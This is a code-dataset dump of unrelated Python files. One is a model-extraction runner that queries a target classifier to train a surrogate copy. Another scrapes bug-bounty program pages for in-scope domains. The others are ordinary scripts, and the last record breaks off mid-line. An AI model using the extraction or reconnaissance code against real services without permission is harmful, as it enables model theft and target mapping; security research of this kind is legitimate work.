dataframe\r\n rd = []\r\n accuracy1 = []\r\n accuracy2 = []\r\n i = 0\r\n pool_len = len(stealer.data)\r\n while stealer.row < (pool_len):\r\n if i >= 1:\r\n # store err_set and tar_lb in files\r\n err_sample, rgt_sample = form_err_rgt_set(target, stealer, i)\r\n\r\n err_data = err_sample.drop(['target'], axis=1)\r\n rgt_data = rgt_sample.drop(['target'], axis=1)\r\n err_label = err_sample['target'].tolist()\r\n rgt_label = rgt_sample['target'].tolist()\r\n frame = [err_data, rgt_data]\r\n both_data = pd.concat(frame)\r\n both_lb = err_label + rgt_label\r\n clf = stealer.train_base_clf(both_data, both_lb)\r\n\r\n add_random = stealer.data[stealer.row : stealer.row+step]\r\n stealer.row += step\r\n #clf = update_clf(err_set, tar_lb, add_random, target, clf)\r\n clf, err_data, err_label = stealer.active_learning(clf, add_random, target, both_data, both_lb)\r\n err_label = pd.DataFrame(err_label, columns=['target'])\r\n err_data = err_data.reset_index(drop=True)\r\n err_sample = pd.concat([err_data, err_label], axis=1)\r\n\r\n store(err_sample, rgt_sample, i)\r\n stealer.models.append(clf)\r\n accu1, accu2 = test_accu(stealer, target)\r\n\r\n print(\"-------------------------------round {}, {} {}, queries={}-----------------------------------\".format(i, accu1, accu2, stealer.queries))\r\n rd.append(stealer.queries)\r\n accuracy1.append(accu1)\r\n accuracy2.append(accu2)\r\n diff = abs(accuracy1[i] - accuracy1[i-1])\r\n print(\"diff\".format(diff))\r\n if i >= 1 and diff <= 0.05:\r\n step += 500\r\n print(\"expand step to {}\".format(step))\r\n i += 1\r\n plt.xlabel('queries')\r\n plt.ylabel('agreement')\r\n plt.title('{} extraction on iris-{}%'.format(tar_type, stealer.proportion))\r\n plt.plot(rd, accuracy1, \"b--\", linewidth=1)\r\n plt.show()\r\n\r\n plt.xlabel('queries')\r\n plt.ylabel('accuracy')\r\n plt.title('{} extraction on iris-{}%'.format(tar_type, stealer.proportion))\r\n plt.plot(rd, accuracy2, \"b--\", linewidth=1)\r\n plt.show()\r\n\r\n '''test aug_data'''\r\n s_aug_pred = stealer.forest_predict(stealer.train_aug, rows=len(stealer.train_aug))\r\n t_aug_pred = target.predict(stealer.train_aug)\r\n print(accuracy_score(s_aug_pred, t_aug_pred))\r\n","sub_path":"iris/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"220239640","text":"import pandas as pd\n\n#importing the file\nsales_data = pd.read_csv('datasets/sales_data.csv', parse_dates=True, index_col='InvoiceDate')\n\n#reviewing the file\n# print(df.head())\n\n#looking with .info() method\n# print(sales_data.info())\n\n#use .loc accessor (slicing can also be used or just selecting the year or month etc)\nmorning_sale = sales_data.loc['2010-12-01 08:26:00', 'Description']\nprint(morning_sale)","sub_path":"Data Analysis/datetime/indexing_time_series.py","file_name":"indexing_time_series.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"140251025","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n# pylint: disable=maybe-no-member, invalid-name\n\n\"\"\"Test import of commentable fields.\"\"\"\n\nimport collections\nimport ddt\n\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\n\n\n@ddt.ddt\nclass TestImportCommentable(TestCase):\n \"\"\"Class with tests of importing fields of Commentable mixin.\"\"\"\n\n @ddt.data(\n all_models.Objective,\n all_models.Requirement,\n all_models.Regulation,\n all_models.Policy,\n all_models.Standard,\n all_models.Threat,\n all_models.Contract,\n )\n def test_model_import(self, model):\n \"\"\"Test import commentable model {}.\"\"\"\n recipients = model.VALID_RECIPIENTS\n model_name = model.__name__\n import_data = [\n (\"object_type\", model_name),\n (\"Code\", \"\"),\n (\"Title\", \"{}-Title\".format(model_name)),\n (\"Admin\", \"user@example.com\"),\n (\"Recipients\", ','.join(recipients)),\n (\"Send by default\", True),\n ]\n response = self.import_data(collections.OrderedDict(import_data))\n self._check_csv_response(response, {})\n obj = model.query.first()\n self.assertEqual(obj.send_by_default, True)\n self.assertEqual(sorted(obj.recipients.split(\",\")), sorted(recipients))\n\n def test_program_import(self):\n \"\"\"Test import of program recipients.\"\"\"\n recipients = all_models.Program.VALID_RECIPIENTS\n model_name = \"Program\"\n import_data = [\n (\"object_type\", model_name),\n (\"Code\", \"\"),\n (\"Title\", \"{}-Title\".format(model_name)),\n (\"Program Managers\", \"user@example.com\"),\n (\"Recipients\", ','.join(recipients)),\n (\"Send by default\", True),\n ]\n response = self.import_data(collections.OrderedDict(import_data))\n self._check_csv_response(response, {})\n obj = all_models.Program.query.first()\n self.assertEqual(obj.send_by_default, True)\n self.assertEqual(sorted(obj.recipients.split(\",\")), sorted(recipients))\n","sub_path":"test/integration/ggrc/converters/test_import_commentable.py","file_name":"test_import_commentable.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"441236318","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ntr = 10\na = 2\ntc = .15\np = 75\ni = .10\nc = .005\ny = 10\nz = 0\nx = 0\nn = 0\n#taxableInvest = (tc * p * (1+i)**y + (1 - tc)*tr * a)\ntaxableInvest = (.85*(75) * (1 + .10)**y) + .15*(75)\nrothInvest = (p * (1 + i - c)**y)\n\nprint ('roth invest %s' % rothInvest)\nprint ('tax invest %s' % taxableInvest)\nplt.figure(1)\nplt.subplot(221)\nplt.title('Roth')\nplt.yscale('linear')\nplt.ylabel('dollars')\nplt.xlabel('years')\n#plt.axis([1,5,1,1000])\n#plt.plot([y, rothInvest], 'r--')\nplt.plot([0,rothInvest], 'b--')\n#plt.plot([y, taxableInvest], 'b--')\nplt.grid(True)\n\nplt.show()","sub_path":"python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382425433","text":"import scrapy\nfrom urllib.parse import urlparse\nfrom scrapy.linkextractors import LinkExtractor\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\n\nclass BugBountyScraperSpider(scrapy.Spider):\n name = \"bug_bounty_scraper\"\n\n def start_requests(self):\n urls = [\n 'https://bountyfactory.io/programs',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for a in response.css('a.media-heading.text-semibold'):\n yield response.follow(a, callback=self.parse_company)\n\n # IF MANY PAGES :\n # next_page = response.css('li.next a::attr(href)').extract_first()\n # if next_page is not None:\n # yield response.follow(next_page, self.parse)\n\n def get_company_info(self, name):\n url = 'https://www.google.fr/search?q=' + name\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n desc = soup.find(\"span\", { \"class\" : \"st\" }).text\n\n date_creation = ''\n reg = re.search('Création[^0-9]*([0-9]*)', r.text)\n if reg is not None:\n date_creation = reg.group(1)\n if reg is None:\n reg = re.search('Effectif[^0-9]*([0-9 ]*)', r.text)\n employee_number = ''\n reg = re.search('Nombre d[^0-9]*([0-9]*)', r.text)\n if reg is not None:\n employee_number = reg.group(1)\n\n\n return desc,date_creation,employee_number\n\n def parse_company(self, response):\n links = LinkExtractor(restrict_css='div.panel-body.markdown', deny_domains=['github.com', 'bountyfactory.io']).extract_links(response)\n urls = [link.url for link in links]\n hostnames = [urlparse(url).hostname for url in urls]\n\n name = response.url.split(\"/\")[-2]\n desc, date_creation, employee_number = self.get_company_info(name)\n\n yield {\n 'company': name,\n 'domains': hostnames,\n 'desc': desc,\n 'date_creation': date_creation,\n 'employee_number': employee_number,\n }\n","sub_path":"scraping_test/spiders/bounty_factory.py","file_name":"bounty_factory.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"190646037","text":"#Leia 2 (duas) notas parciais de um aluno, calcule a média e escreva a mensagem:\r\n#o \"Aprovado\", se a média alcançada for maior ou igual a sete;\r\n#o \"Reprovado\", se a média for menor do que sete;\r\n#o \"Aprovado com Distinção\", se a média for igual a dez.\r\n\r\nnota_1 = int(input('Digite a primeira nota: '))\r\nnota_2 = int(input('Digite a segunda nota: '))\r\n\r\nmedia = ( nota_1 + nota_2 ) / 2\r\n\r\nif media >= 7:\r\n print('Aprovado')\r\n\r\nif media < 7 :\r\n print('Reprovado')\r\n\r\nif media == 10:\r\n print('Aprovado com distinção')","sub_path":"Fabio02_P02/F2_P2_Q4_MEDIAALUNO.py","file_name":"F2_P2_Q4_MEDIAALUNO.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347897870","text":"import xml.etree.ElementTree as ET\nimport mysql.connector \nfrom mysql.connector import errorcode\nfrom sys import *\n#import the module in other directory\nimport platform as pf\nimport re\n\n\nos = pf.platform()\nif re.match(r'Windows.*', os):\n path.append('C:\\\\Users\\\\EMAAHAF\\\\Documents\\\\TestOptimization_Ericsson\\\\DBS_connections')\nelse:\n path.append('/repo/ezhuyui/test_optimizatoin_research/data_loading_module')\nimport DBS_connection_dictonaries as dc\n\n##---------------------------------self\n\ndef get_tr(area):\n #source_table_ctc = \"tar_ctc_runs_\" + area\n #source_table_suite = \"tar_testsuite_runs\"\n tr_area = \"tr_\" + area\n conn_ezh = dc.ini_db_connection(dc.ezh)\n try:\n dc.cleanup_ezh(tr_area)\n cur_ezh = conn_ezh.cursor()\n query = \"CREATE TABLE %s (ThcTcJavaName varchar(200) NOT NULL, trid VARCHAR(64), dateFiled date, PRIMARY KEY (ThcTcJavaName, trid, dateFiled))\"%(tr_area)\n cur_ezh.execute(query)\n query = \"SELECT ThcTcJavaName, trid, DATE(EndDateTime) as df FROM tdrhistory.tar_ctc_runs WHERE (SeqId > 37600199 AND SeqId < 39999901) AND qualityarea = 'Functionality' AND testdata LIKE '%ENB=OT%' AND trid IS NOT NULL AND trid NOT LIKE '%%artf%%' AND trid NOT LIKE '%%RTT%%' GROUP BY ThcTcJavaName, trid, df;\"\n cur_ezh.execute(query)\n trids = cur_ezh.fetchall()\n for row in trids:\n tr = row[1].split(',')\n for item in tr:\n if(' ' in item):\n item = item.replace(' ', '')\n #elif('?' in item):\n # item = item.replace('?', '')\n #check = re.search('\\w{2}\\d{5}', item)\n #if(not check):\n # continue\n #item = check.group()\n query = \"SELECT * FROM %s WHERE ThcTcJavaName = '%s' AND trid = '%s' AND dateFiled = '%s'\"%(tr_area, row[0], item, row[2])\n cur_ezh.execute(query)\n duplicate = cur_ezh.fetchall()\n if(len(duplicate) != 0):\n continue\n query = \"INSERT INTO %s VALUES ('%s','%s','%s')\"%(tr_area, row[0], item, row[2])\n cur_ezh.execute(query)\n \n \n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or 1word\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n \n \n\n\nif __name__ == \"__main__\":\n area = argv[1]\n get_tr(area)","sub_path":"pyscripts/pyscripts_old/tr_mining/tr_area.py","file_name":"tr_area.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510174236","text":"class Solution(object):\n def numEquivDominoPairs(self, dominoes):\n \"\"\"\n :type dominoes: List[List[int]]\n :rtype: int\n \"\"\"\n r = sorted(map(sorted, dominoes))\n ans = 0\n t = 0\n for i in range(1, len(r)):\n if r[i] == r[i - 1]:\n t += 1\n else:\n ans += for_sum(t)\n t = 0\n\n if t:\n ans += for_sum(t)\n\n return ans\n\n\ndef for_sum(n):\n return (1 + n) * n / 2\n\n\ns = Solution()\nprint(s.numEquivDominoPairs([[1, 2], [1, 2], [1, 1], [1, 2], [2, 2]]))\n","sub_path":"leetcode/algorithm/number-of-equivalent-domino-pairs.py","file_name":"number-of-equivalent-domino-pairs.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"224280024","text":"from mcpi.minecraft import Minecraft\nimport time\n\nmc = Minecraft.create()\n\ntime.sleep(2)\n\npos = mc.player.getPos()\n\nx = pos.x\ny = pos.y\nz = pos.z\n\nblockType = mc.getBlock(x,y,z)\n\nmc.postToChat(str(blockType))\nmc.postToChat(\"I am in water: \" + str(blockType ==9 ))\n\n\n","sub_path":"minecraft-pi/bookCode/Mission18_AmISwimming.py","file_name":"Mission18_AmISwimming.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433002690","text":"import struct\nfrom datetime import time\nimport udp\nimport enum\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n\n#GOLBAL CLASSICAL VALUES\nWINDOWS_SIZE = 8\nmaxl = 1024 #max length\nmaxre = 10 #max retry if timeout\nReset_bit = 8\nSYN = 4\nNIF = 2\nACK = 1\nudp_packet_length = 500\nbegin_bytes = b'000000000000000'\nuser_address = (\"127.0.0.1\", 9942)\n\nclass TODO(enum.Enum):\n A = 0 #bind\n B = 1 #listen\n C = 2 #accept\n D = 3 #connect_requested\n E = 4 #connect\n F = 5 #close_requested\n G = 6 #close\n\nclass CONDITION(enum.Enum):\n A = 0 #OPENED\n B = 1 #LISTING\n C = 2 #CONNECTING\n D = 3 #CONNECTED\n E = 4 #CLOSING\n F = 5 #CLOSED\n\n\nclass FSM(object):\n def __init__(self, condition=None):\n sc = self._current\n sc = None\n if type(condition) == CONDITION:\n sc = condition\n elif type(condition) == int:\n sc = CONDITION(condition)\n elif condition is None:\n sc = CONDITION.A\n else:\n raise ValueError(\"Invalid condition\")\n\n @property\n def current(self):\n return self._current\n\n @current.setter\n def current(self, current: CONDITION):\n self._current = current\n logging.info('Change From %s to %s', self._current, current)\n\n def dispatch(self, todo: str):\n sc = self._current\n if sc == CONDITION.A:\n if todo == TODO.A:\n sc = CONDITION.B\n elif todo == TODO.B:\n sc = CONDITION.B\n elif todo == TODO.E:\n sc = CONDITION.D\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.D:\n if todo == TODO.F:\n sc = CONDITION.E\n elif todo == TODO.G:\n sc = CONDITION.F\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.B:\n if todo == TODO.D:\n sc = CONDITION.C\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.E:\n if todo == TODO.G:\n ssc = CONDITION.F\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.C:\n if todo == TODO.C:\n sc = CONDITION.D\n else:\n raise ValueError(\"Invalid action\")\n else:\n logging.warning(\"Nothing to do\")\n\n\nclass datagram(object):\n def _set_header(self, offset, value):\n tmp = list(self._header)\n for index, byte in enumerate(value):\n tmp[offset + index] = byte\n self._header = bytes(tmp)\n\n # For datagram type\n @property\n def dtype(self) -> int:\n return self._dtype\n\n @dtype.setter\n def dtype(self, dtype: int):\n self._dtype = dtype\n self._set_header(0, self._dtype.to_bytes(1, 'big'))\n\n # For Seq\n @property\n def seq(self):\n return int.from_bytes(self._seq, 'big')\n\n @seq.setter\n def seq(self, seq):\n if type(seq) == int:\n self._seq = seq.to_bytes(4, 'big')\n self._set_header(1, self._seq)\n else:\n raise ValueError(\"Seq number must be an integer\")\n\n # For SEQ_ACK\n @property\n def seq_ack(self):\n return int.from_bytes(self._seq_ack, 'big')\n\n @seq_ack.setter\n def seq_ack(self, seq_ack):\n if type(seq_ack) == int:\n self._seq_ack = seq_ack.to_bytes(4, 'big')\n self._set_header(5, self._seq_ack)\n else:\n raise ValueError(\"SEQ_ACK number must be an integer\")\n\n # For LEN\n @property\n def length(self):\n return int.from_bytes(self._length, 'big')\n\n @length.setter\n def length(self, length):\n raise NotImplementedError(\"Length cannot be set.\")\n\n # For CHECKSUM\n @property\n def checksum(self):\n tmp = self._header[0:13] + b'\\x00\\x00' + self._payload\n sum = 0\n for byte in tmp:\n sum += byte\n sum = -(sum % 256)\n return (sum & 0xFF)\n\n @checksum.setter\n def checksum(self, checksum):\n raise NotImplementedError(\"Checksum cannot be set.\")\n\n @property\n def valid(self):\n return self.checksum == int.from_bytes(self._checksum, 'big')\n\n # For PAYLOAD\n @property\n def payload(self):\n return self._payload\n\n @payload.setter\n def payload(self, payload):\n if type(payload) == bytes:\n self._length = len(payload).to_bytes(4, 'big')\n self._payload = payload\n else:\n raise TypeError(\"a bytes-like object is expected\")\n\n def __init__(self, raw_data=None):\n if type(raw_data) == bytes:\n self._decode(raw_data)\n else:\n self._header = bytes(15)\n self._dtype = 0\n self._seq = bytes(4)\n self._seq_ack = bytes(4)\n self._length = bytes(4)\n self._checksum = bytes(2)\n self._payload = b''\n\n def _decode(self, raw_data: bytes):\n if len(raw_data) < 15:\n raise ValueError(\"Invalid data!\")\n self._header = raw_data[0:15]\n self._dtype = self._header[0]\n self._seq = self._header[1: 5]\n self._seq_ack = self._header[5: 9]\n self._length = self._header[9: 13]\n self._checksum = self._header[13: 15]\n\n self._payload = raw_data[15:]\n\n def _encode(self):\n self._set_header(13, self.checksum.to_bytes(2, 'big'))\n return self._header + self._payload\n\n def __call__(self):\n return self._encode()\n\n def __str__(self):\n return self.__repr__()\n\n def __repr__(self):\n try:\n res = \"Type:\\t{}\\nSeq:\\t{}\\nSEQ_ACK:\\t{}\\nLENGTH:\\t{}\\nChecksum:\\t{}\\nPayload:\\t{}\".format(\n self.dtype, self.seq, self.seq_ack, self.length, self.checksum, self.payload)\n return res\n except Exception:\n return \"Invalid\"\n\n\ndef check_sum(data):\n pass\n\ndef header_send(args):\n pass\n\nclass socket(udp.UDPsocket):\n def __init__(self, ):\n super().__init__()\n self.condition = FSM(CONDITION.A)\n self.seq = 0\n self.seq_ack = 0\n self.accept_null = True\n\n def bind(self, addr):\n self.condition.dispatch(TODO.A)\n super().bind(addr)\n\n def accept(self):\n print(\"Accept is not implemented for connectionless rdt\")\n raise NotImplementedError\n\n def connect(self, addr):\n self.to = addr\n\n def close(self):\n print(\"Close is not implemented for connectionless \")\n raise NotImplementedError\n\n def recvfrom(self, bufsize=2048):\n QvQ = super().recvfrom(bufsize)\n if QvQ is None:\n raise udp.timeout\n\n data, addr = QvQ\n data = datagram(data)\n if data.valid:\n return data, addr\n raise Exception(\"Invalid packet\")\n\n def recv(self, bufsize: int):\n\n rcvd_data = b''\n timeout_count = -1\n expected = self.seq_ack\n\n ack = datagram()\n\n logging.info('receive Ready ...')\n while True:\n try:\n data, addr = self.recvfrom(bufsize)\n\n logging.debug('received raw segment')\n timeout_count = 0 # no timeout, reset\n\n logging.info('expected: #%d, received: #%d', expected, data.seq)\n if data.seq == expected:\n if data.dtype & NIF:\n logging.info('FIN Recieved')\n break\n else:\n rcvd_data += data.payload\n expected += 1\n ack.seq = self.seq\n ack.seq_ack = expected\n super().sendto(ack(), addr)\n except udp.timeout:\n if timeout_count < 0:\n continue\n timeout_count += 1\n logging.info('timed out, count=%d', timeout_count)\n if timeout_count > maxre:\n raise ConnectionAbortedError('timed out')\n except ValueError:\n ack.seq = self.seq\n ack.seq_ack = expected\n super().sendto(ack(), addr)\n except Exception as e:\n logging.warning(e)\n\n self.seq += 1\n self.seq_ack = expected + 1\n\n nif_ack = datagram()\n nif_ack.dtype |= NIF\n nif_ack.dtype |= ACK\n nif_ack.seq = self.seq\n nif_ack.seq_ack = self.seq_ack\n nif_err_count = 0\n self.sendto(nif_ack(), addr)\n\n logging.info('----------- receipt finished -----------')\n return rcvd_data\n\n def recv_(self, buffersize=None, header_format=None, data_format=None):\n print(\"data in\")\n try:\n data_uesless, addr_uesless = self.recvfrom(buffersize)\n except BlockingIOError:\n pass\n except TypeError:\n pass\n temp_ack = self.seq_ack\n data_willsend = \"\"\n count = 0\n while True:\n time.sleep(0.01)\n try:\n data, addr = self.recvfrom(buffersize)\n except BlockingIOError:\n continue\n except TypeError:\n continue\n if check_sum(data):\n continue\n data_header = struct.unpack(header_format, data[0:15])\n try:\n datas = str(struct.unpack(\"{}s\".format(str(data_header[3])), data[15:])[0].decode(data_format))\n except UnicodeDecodeError:\n continue\n except struct.error:\n continue\n if datas == \"\" and self.accept_null:\n continue\n else:\n print(\"this time recieve {}\".format(datas))\n self.segment = data_header[0]\n if not check_sum(data) and data_header[1] == temp_ack:\n count += 1\n data_willsend += datas\n print(header_send)\n for i in range(0, 3, 1):\n self.sendto(header_send, self.client_address)\n temp_ack += len(datas)\n if self.segment == count:\n break\n for i in range(0, 100, 1):\n time.sleep(0.01)\n print(\"recieve finish\")\n self.seq_ack = temp_ack\n self.accept_null = False\n return data_willsend\n\n def send(self, content: bytes, reciver_addr):\n acked = []\n buffer = []\n\n base = self.seq\n now = 0\n\n for i in range(0, len(content), maxl):\n cl = min(maxl, len(content) - i)\n data = datagram()\n data.payload = content[i:i + cl]\n data.seq = base + now\n now += 1\n buffer.append(data)\n acked.append(False)\n\n tn = 0 #counting timeout number\n l, r = 0, 0\n while l < len(buffer):\n r = min(len(buffer), l + WINDOWS_SIZE)\n\n logging.info('Send packet from [%d, %d]' % (buffer[l].seq, buffer[r - 1].seq))\n for i in range(l, r):\n pkt = buffer[i]\n pkt.seq_ack = self.seq_ack\n self.sendto(pkt(), reciver_addr)\n\n while True:\n conuti = 0;\n try:\n data, addr = self.recvfrom(2048)\n assert addr == reciver_addr\n tn = 0\n logging.info('#%d acked', data.seq_ack)\n assert buffer[l].seq <= data.seq_ack <= buffer[r - 1].seq + 1\n l = max(l, data.seq_ack - base)\n logging.debug('base=%d', base)\n logging.info('Window length = %d', r - l)\n if r - l == 0:\n logging.info('Finish sending')\n break\n except ValueError:\n conuti += 1\n continue\n except AssertionError:\n conuti += 1\n continue\n except BlockingIOError:\n conuti += 1\n continue\n except TypeError:\n conuti += 1\n continue\n except udp.timeout:\n tn += 1\n logging.info('timed out, count=%d', tn)\n if tn > maxre:\n raise ConnectionError('time out')\n break\n except Exception:\n logging.warning(Exception)\n\n # Finish\n nif = datagram()\n nif.dtype = NIF\n nif.seq = base + now\n nif.seq_ack = self.seq_ack\n nif_err_count = 0\n while True:\n try:\n self.sendto(nif(), reciver_addr)\n data, addr = self.recvfrom(2048)\n\n if data.dtype & ACK and data.dtype & NIF and data.seq_ack == base + now + 1:\n break\n except (udp.timeout, ValueError):\n nif_err_count += 1\n if nif_err_count > maxre:\n break\n except Exception:\n logging.warning(Exception)\n\n self.seq = base + now + 1\n logging.info('----------- all sent -----------')\n","sub_path":"Assignment07/rdt.py","file_name":"rdt.py","file_ext":"py","file_size_in_byte":13352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421789919","text":"#!/usr/bin/env python3.4\n#coding:utf-8\n\n'''\nLeetcode一步一个脚印。\n\n334. Increasing Triplet Subsequence\n\n思路:\n 刚开始没有看懂题目,以为要连续的三个数满足i1 \", checkNumerosValidos(casosTest.__dict__[attr]))","sub_path":"Sudoku/checkNumerosValidos.py","file_name":"checkNumerosValidos.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"203907061","text":"from packs.directories import data_loaded\nfrom packs import directories as direc\nfrom packs.running.compositional_initial_mesh_properties import initial_mesh\nfrom packs.compositional.stability_check import StabilityCheck\nfrom packs.compositional.update_time import delta_time\nfrom get_inputs_compositional import FluidProperties\nfrom packs.utils import constants as ctes\nimport os\nimport numpy as np\nimport time\n\nif data_loaded['compositional_data']['solver']['IMPSAT']:\n from packs.compositional.IMPSAT.compositionalIMPSAT import CompositionalFVM\n from packs.compositional.IMPSAT.properties_calculation import PropertiesCalc\nelse:\n from packs.compositional.IMPEC.compositionalIMPEC import CompositionalFVM\n from packs.compositional.IMPEC.properties_calculation import PropertiesCalc\n\nclass run_simulation:\n '''Class created to compute simulation properties at each simulation time'''\n def __init__(self, name_current, name_all):\n self.name_current_results =os.path.join(direc.flying, name_current + '.npy')\n self.name_all_results = os.path.join(direc.flying, name_all)\n self.loop = 0\n self.vpi = 0.0\n self.t = 0.0\n self.oil_production = 0.\n self.gas_production = 0.\n self.use_vpi = data_loaded['use_vpi']\n self.vpi_save = data_loaded['compositional_data']['vpis_para_gravar_vtk']\n self.time_save = np.array(data_loaded['compositional_data']['time_to_save'])\n self.delta_t = data_loaded['compositional_data']['time_data']['delta_t_ini']\n self.mesh_name = 'compositional_'\n self.all_results = self.get_empty_current_compositional_results()\n self.p1 = PropertiesCalc()\n\n def initialize(self, load, convert, mesh):\n ''' Function to initialize mesh (preprocess) get and compute initial mesh \\\n properties '''\n M, elements_lv0, data_impress, wells = initial_mesh(mesh, load=load, convert=convert)\n ctes.init(M, wells)\n ctes.component_properties()\n if ctes.FR:\n from packs.compositional import prep_FR as ctes_FR\n ctes_FR.run(M)\n fprop = self.get_initial_properties(M, wells)\n return M, data_impress, wells, fprop, load\n\n def get_initial_properties(self, M, wells):\n ''' get initial fluid - oil, gas and water data and calculate initial \\\n properties'''\n\n fprop = FluidProperties(M, wells) # load reservoir properties data and initialize other data\n #fprop.z[:,0] = np.array([0.9,0.1,0.])\n\n '------------------------- Perform initial flash ----------------------'\n\n if ctes.load_k:\n self.p2 = StabilityCheck(fprop.P, fprop.T)\n fprop.L, fprop.V, fprop.xkj[0:ctes.Nc, 0, :], \\\n fprop.xkj[0:ctes.Nc, 1, :], fprop.Csi_j[:,0,:], \\\n fprop.Csi_j[:,1,:], fprop.rho_j[:,0,:], fprop.rho_j[:,1,:] = \\\n self.p2.run_init(fprop.P, np.copy(fprop.z))\n\n if any(([wells['inj_cond']=='reservoir'])):\n z = (wells['z'][wells['inj_cond']=='reservoir']).T\n p_well = StabilityCheck(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']], fprop.T)\n L, V, x, y, Csi_L, Csi_V, rho_L, rho_V = \\\n p_well.run_init(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']],z[:ctes.Nc])\n self.q_vol = np.copy(wells['values_q'][:,wells['inj_cond']=='reservoir'])\n wells['values_q'][:,wells['inj_cond']=='reservoir'] = (Csi_V * V + Csi_L * L) * self.q_vol\n\n else: fprop.x = []; fprop.y = []; fprop.L = []; fprop.V = []\n\n if ctes.load_w: fprop.inputs_water_properties(M) #load water properties\n\n '----------------------- Calculate fluid properties -------------------'\n\n self.p1.run_outside_loop(M, fprop, wells)\n return fprop\n\n def run(self, M, wells, fprop, load):\n ''' Function created to compute reservoir and fluid properties at each \\\n time step '''\n\n t0 = time.time()\n t_obj = delta_time(fprop) #get wanted properties in t=n\n\n '---- Get pressure field and new time step (if the past time step does \\\n not obey the CFL condition) -------------------------------------------'\n\n self.delta_t = CompositionalFVM()(M, wells, fprop, self.delta_t, self.t)\n\n self.t += self.delta_t\n '----------------- Perform Phase stability test and flash -------------'\n\n if ctes.load_k and ctes.compressible_k:\n #self.p2 = StabilityCheck(fprop.P, fprop.T)\n fprop.L, fprop.V, fprop.xkj[0:ctes.Nc, 0, :], \\\n fprop.xkj[0:ctes.Nc, 1, :], fprop.Csi_j[:,0,:], \\\n fprop.Csi_j[:,1,:], fprop.rho_j[:,0,:], fprop.rho_j[:,1,:] = \\\n self.p2.run(fprop.P, np.copy(fprop.z))\n\n if any(([wells['inj_cond']=='reservoir'])):\n z = (wells['z'][wells['inj_cond']=='reservoir']).T\n p_well = StabilityCheck(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']], fprop.T)\n L, V, x, y, Csi_L, Csi_V, rho_L, rho_V = \\\n p_well.run_init(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']],z[:ctes.Nc])\n wells['values_q'][:,wells['inj_cond']=='reservoir'] = (Csi_V * V + Csi_L * L) * self.q_vol\n\n '----------------------- Update fluid properties ----------------------'\n\n self.p1.run_inside_loop(M, fprop)\n\n\n '-------------------- Advance in time and save results ----------------'\n\n self.update_vpi(fprop, wells)\n #if self.vpi>0.2: import pdb; pdb.set_trace()\n self.delta_t = t_obj.update_delta_t(self.delta_t, fprop, ctes.load_k, self.loop)#get delta_t with properties in t=n and t=n+1\n if len(wells['ws_p'])>0: self.update_production(fprop, wells)\n\n self.update_loop()\n t1 = time.time()\n dt = t1 - t0\n if self.use_vpi:\n if np.round(self.vpi,3) in self.vpi_save:\n self.update_current_compositional_results(M, wells, fprop, dt) #ver quem vou salvar\n else:\n if self.time_save[0] == 0.0 or self.t in self.time_save:\n self.update_current_compositional_results(M, wells, fprop, dt)\n #import pdb; pdb.set_trace()\n\n\n\n def update_loop(self):\n ''' Function to count how many loops it has been since the simulation \\\n started'''\n\n self.loop += 1\n\n def update_vpi(self, fprop, wells):\n ''' Function to update time in vpi units (volume poroso injetado)'''\n\n if len(wells['ws_inj'])>0:\n flux_vols_total = wells['values_q_vol']\n flux_total_inj = np.absolute(flux_vols_total)\n else: flux_total_inj = np.zeros(2)\n self.vpi = self.vpi + (flux_total_inj.sum())/sum(fprop.Vp)*self.delta_t\n\n\n def get_empty_current_compositional_results(self):\n return [np.array(['loop', 'vpi [s]', 'simulation_time [s]', 't [s]', 'pressure [Pa]', 'Sw', 'So', 'Sg',\n 'Oil_p', 'Gas_p', 'z', 'centroids', 'Nk', 'xkj'])]\n\n def update_production(self, fprop, wells):\n ''' Function to compute oil and gas production rate [m³/s] through time'''\n if ctes.load_k:\n self.oil_production += 